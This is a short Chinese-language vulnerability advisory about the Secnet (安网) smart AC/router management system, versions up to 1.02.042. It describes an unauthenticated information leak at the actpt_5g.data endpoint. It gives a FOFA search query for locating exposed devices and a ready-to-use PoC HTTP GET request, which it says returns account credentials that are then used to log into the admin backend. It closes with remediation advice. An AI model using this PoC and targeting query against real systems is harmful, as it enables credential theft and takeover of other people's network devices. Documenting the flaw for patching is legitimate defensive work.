0x01 产品简介
Secnet安网智能AC管理系统是广州安网通信技术有限公司(简称“安网通信”)的无线AP管理系统。
0x02 漏洞概述
Secnet-智能路由系统 actpt_5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限失控,处于极不安全状态。
0x03 影响范围
version <= 1.02.042
0x04 复现环境
FOFA:
title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"
0x05 漏洞复现
PoC
GET /actpt_5g.data HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close读取账号密码信息
登录后台
0x06 修复建议
删除该接口页面或增加访问控制
升级至安全版本
